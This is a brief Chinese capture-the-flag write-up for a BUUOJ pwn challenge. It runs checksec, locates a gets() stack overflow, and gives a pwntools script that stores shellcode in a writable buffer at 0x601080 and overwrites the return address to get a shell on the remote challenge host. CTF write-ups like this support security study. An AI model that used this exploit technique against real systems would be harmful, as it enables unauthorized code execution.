0x1 checksec

没有开启保护,有可写segments,考虑shellcode
0x2 IDA
1.main

gets()函数溢出点
偏移量
栈溢出到shellcode,getshell
0x3 EXP
from pwn import *
context.log_level="debug"
p=remote("node4.buuoj.cn",29553)
context.arch="amd64"
shellcode=asm(shellcraft.sh())
name=0x601080
p.recvuntil("name\n")
p.sendline(shellcode)
p.recvuntil("?\n")
payload="A"*0x28+p64(name)
p.sendline(payload)
p.interactive()
栈溢出攻击
本文介绍了一个利用栈溢出漏洞获取系统权限的过程。通过分析未开启保护的程序,找到gets()函数溢出点,并构造payload发送shellcode,最终实现getshell。使用Python编写了exploit脚本。
1151





